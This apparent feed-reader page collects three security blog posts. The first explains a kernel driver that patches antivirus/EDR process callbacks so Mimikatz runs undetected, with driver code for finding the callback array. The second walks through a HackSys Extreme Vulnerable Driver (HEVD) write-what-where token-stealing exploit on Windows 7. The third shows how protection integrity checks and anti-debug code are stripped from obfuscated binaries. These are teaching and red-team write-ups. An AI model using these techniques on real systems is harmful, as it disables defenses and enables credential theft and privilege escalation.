Reading view

There are new articles available, click to refresh the page.

Kernel Karnage – Part 1

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Improving the write-what-where HEVD PoC (x86, Win7)

Introduction

This one is about another HEVD exercise (look here to see the my previous HEVD post); the arbitrary write (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c). The main reason I decided to write up my experience with it is the fact that it instantly occurred to me that the official exploitation process, used both in the original PoC as well as described here, leaves the kernel in an unstable state with high probability of crash anytime after the exploit is run. So, this post is more about the exploitation technique, the problem it creates and the solution it asks for, rather than the vulnerability itself. It also occurred to me that doing HEVD exercises fully (like understanding exactly what and how) is quite helpful in improving the general understanding of how the operating system works.

When it comes to stuff like setting up the environment, please refer to my earlier HEVD post. Now let's get started.

The vulnerability

This one is a vanilla write-what-where case - code running in kernel mode performs a write operation of an arbitrary (user-controlled) value into an arbitrary (user-controlled) address. In case of a x86 system (we keep using these for such basic exercises as they are easier while debugger output with 32-bit addresses is more readable), it usually boils down to being able to write an arbitrary 32-bit value into an arbitrary 32-bit address. However, it is also usually possible to trigger the vulnerability more than once (which we will do in this case, by the way, just to fix the state of the kernel after privilege escalation), so virtually we control  data blocks of any size, not just four bytes.

First of all, we have the input structure definition at https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/ArbitraryOverwrite.h - it's as simple as it could be, just two pointers:

Then, we have the TriggerArbitraryWrite function in https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c (screenshot below). First, we have a call to ProbeForRead on the input pointer, to make sure that the structure itself is located in user space (both ProbeForRead and ProbeForWrite methods throw an access violation exception if the address provided turns out to belong to the kernel space address range). Then, What and Where values held by the structure (note that these are both pointers and there are no additional checks here whether the addresses those pointers contain belong to kernel or  user space!) are copied into the local kernel mode function variables:

Then, we have the vulnerable write-what-where:

Now, let's see how this C code actually looks like after it's compiled (disassembly view in windbg):

Exploitation

So, as always, we just want to run our shellcode in kernel mode, whereas the only thing our shellcode does is overwriting the security token of our exploit process with the one of the SYSTEM process (token-stealing shellcode).  Again, refer to the previous blog post https://hackingiscool.pl/hevd-stackgs-x86-win7/ to get more details on the shellcode used.

To exploit the arbitrary write-what-where to get our shellcode executed by the kernel, we want to overwrite some pointer, some address residing in the kernel space, that either gets called frequently by other processes (and this is what causes trouble post exploitation if we don't fix it!) or is called by a kernel-mode function that we can call from our exploit process (this is what we will do to get our shellcode executed). In this case we will stick to the HalDispatchTable method - or to be more precise, HalDispatchTable+0x4. The method is already described here https://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html (again, I recommend this read), but let's paraphrase it.

First, we use our write-what-where driver vulnerability to overwrite 4 bytes of the the nt!HalDispatchTable structure (nt!HalDispatchTable at offset 0x4, to be exact). This is because the NtQueryIntervalProfile function - a function that we can call from user mode - results in calling nt!KeQueryIntervalProfile (which already happens after switching into kernel mode), and that function calls whatever is stored at nt!HalDispatchTable+0x4:

So, the idea is to first exploit the arbitrary write to overwrite whatever is stored at nt!HalDispatchTable+0x4 with the user-mode address of our shellcode, then call the NtQueryIntervalProfile only to trick the kernel into executing it via calling HalDisaptchTable+0x4 - and it works like a charm on Windows 7 (kernel mode execution of code located in user mode buffer, as no SMEP in place).

The problem

The problem is that nt!HalDispatchTable is a global kernel structure, which means that once we tamper it, it will still be there if any other program refers to it (e.g. calls NtQueryIntervalProfile). And it WILL affect whatever we will be doing enjoying our SYSTEM privileges, because it WILL crash the entire system.

Let's say that the buffer holding our shellcode in our user mode exploit is at 00403040. If we overwrite the original value of nt!HalDispatchTable+0x4 with it, that shellcode will only be reachable and thus callable if the current process being executed is our exploit. Once the scheduler interrupt switches the current CPU core to another process, in the context of that process the user mode virtual address of 00403040 will either be invalid (won't even fall into any committed/reserved virtual address range within the virtual address space used by that process) or it will be valid as an address, but in reality it will be mapped to a different physical address, which means it will hold something completely different than our shellcode. Remember, each process has its own address space, separate from all other processes, whereas the address space of the kernel is global for the entire system. Therefore every kernel space address makes sense to the entire system (kernel and all processes), whereas our shellcode at 00403040 is only accessible to our exploit process AND the kernel - but only when the process currently being executed is our exploit. The same address referred to from a different process context will be invalid/point at something completely different.

So, after we tamper HalDispatchTable+0x4 by overwriting it with the address of the shellcode residing in the memory of the current process (our exploit) and call NtQueryIntervalProfile to get the shellcode executed, our process should now have SYSTEM privileges (and so will any child processes it spawns, e.g. a cmd.exe shell).

Therefore, if any other process in the system, after we are done with privilege escalation, calls NtQueryIntervalProfile, it will as well trick the kernel into trying to execute whatever is located under the 00403040 address. But since the calling process won't have this address in its working set or will have something completely different mapped under it, it will lead to a system crash. Of course this could be tolerated if we performed some sort of persistence immediately upon the elevation of privileges, but either way as attackers we don't want disruptions that would hurt our customer or potentially tip the defenders off. We don't want system crashes.

This is not an imaginary problem. Right after running the initial version of the PoC (which I put together based on the official HEVD PoC), all of the sudden I saw this in windbg:

Obviously whatever was located at 0040305b  at the time ( 000a - add byte ptr [edx],cl), was no part of my shellcode. So I did a quick check to see what was the process causing this - by issuing the !vad command to display the current process VADs (Virtual Address Descriptors), basically the memory map of the current process, including names of the files mapped into the address space as mapped sections - which includes the path to the original EXE file:

One of svchost.exe processes causing the crash by calling HalDispatchTable+0x4

One more interesting thing is that - if we look at the stack trace (two screenshots above) - the call of HalDispatchTable+0x4 did not originate from KeQueryIntervalProfile function, but from nt!EtwAddLogHeader+0x4b. Which suggests that  HalDispatchTable+0x4 is called from more places than just NtQueryIntervalProfile, adding up to the probability of such a post-exploitation crash being very real.

The solution

So, the obvious solution that comes to mind is restoring the original HalDispatchTable+0x4 value after exploitation. The easiest approach is to simply trigger the vulnerability again, with the same "where" argument ( HalDispatchTable+0x4) and a different "what" argument (the original value as opposed to the address of our user mode shellcode).

Now, to be able to do this, first we have to know what that original value of nt!HalDispatchTable+0x4 is. We can't try to read it in kernel mode from our shellcode, since we need to overwrite it first in order to get the shellcode execute in the first place. Luckily, I figured out it can be calculated based on information attainable from regular user mode execution (again, keep in mind this is only directly relevant to the old Windows 7 x86 I keep practicing on, I haven't tried this on modern Windows yet, I know that SMEP and probably CFG would be our main challenges here).

First of all, let's see what that original value is before we attempt any overwrite. So, let's view nt!HalDispatchTable:

The second DWORD in the memory block under nt!HalDispatchTable contains 82837940. Which definitely looks like an address in kernel mode. It has to be - after all, it is routinely called from other kernel-mode functions, as code, so it must point at kernel mode code. Once I called it up with dt command, windbg resolved it to HaliQuerySystemInformation. Running disassembly view command uu on it, revealed the full symbol name (hal!HaliQuerySystemInformation) and showed that in fact there is a function there (just based on the first few assembly lines we can see it is a normal function prologue).

OK, great, so we know that nt!HalDispatchTable+0x4, the pointer we abuse to turn arbitrary write into a privilege escalation, originally points to a kernel-mode function named hal!HaliQuerySystemInformation (which means the function is a part of the hal module).

Let's see more about it:

Oh, so the module name behind this is halacpi.dll. Now we both have the function name and the module name. Based solely on this information, we can attempt to calculate the current address of hal!HaliQuerySystemInformation dynamically. To do this, we will require the following two values:

  1. The current base address the halacpi.dll module has been loaded (we will get it dynamically by calling NtQuerySystemInformation from our exploit).
  2. The offset of the HaliQuerySystemInformation function within the halacpi.dll module itself (we will pre-calculate the offset value and hardcode it into the exploit code - so it will be version-specific). We can calculate this offset in windbg by subtracting the current base address of the halacpi.dll kernel-mode module (e.g. taken from the lmDvmhal command output) from the absolute address of the  hal!HaliQuerySystemInformation function as resolved by windbg. We can also calculate (confirm) the same offset with static analysis - just load that version of halacpi.dll into Ghidra, download the symbols file, load the symbols file, then find the static address of the function with its address within the binary and subtract the preferred module base address from that address.

Below screenshot shows the calculation done in windbg:

Calculating the offset in windbg

Below screenshots show the same process with Ghidra:

Preferred image base - 00010000
Finding the function (symbols must be loaded)
HaliQuerySystemInformation static address in the binary (assembly view)

Offset calculation based on information from Ghidra: 0x2b940 - 0x10000 = 0x1b940.

So, during runtime, we need to add 0x1b940 (for this particular version of halacpi.dll - remember, other versions will most likely have different offsets) to the dynamically retrieved load base address of halacpi.dll, which we retrieve by calling NtQuerySystemInformation and iterating over the buffer it returns (see the PoC code for details). The same function, NtQuerySystemInformation, is used to calculate the runtime address of the HalDispatchTable - the "what" in our exploit (as well as the  original HEVD PoC code and many other exploits of this sort). In all cases  NtQuerySystemInformation is called to get the current base address of the ntoskrnl.exe module (the Windows kernel). Then, instead of using a hardcoded (fixed) offset to get HalDispatchTable, a neat trick with LoadLibraryA and GetProcAddress is used to calculate it dynamically during runtime (see the full code for details).

The reason I could not reproduce this fully dynamic approach of calculating the offset from the base (calling LoadLibrary(halacpi.dll) and then GetProcAddress(HaliQuerySystemInformation)) to calculate hal!HaliQuerySystemInformation and used a hardcoded, fixed, manually precalculated 0x1b940 offset instead, is because the HaliQuerySystemInformation function is not exported by halacpi.dll - whereas GetProcAddress only works for functions that have their corresponding entries present in the DLL Export Table.

Full PoC

The full PoC I put together can be found here: https://gist.github.com/ewilded/4b9257b552c6c1e2a3af32879f623803.

nt/system shell still running after the exploit process's exit
The original HalDispatchTable+0x4 restored after exploit execution

A Look At Some Real-World Obfuscation Techniques

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed, by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT(Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to canonical C++ language’s internal initialization functions such as _initterm() and _initterm_e.

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory):
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed but smoothen the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and send the execution into a stack-mangling loop before continuing execution which is leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

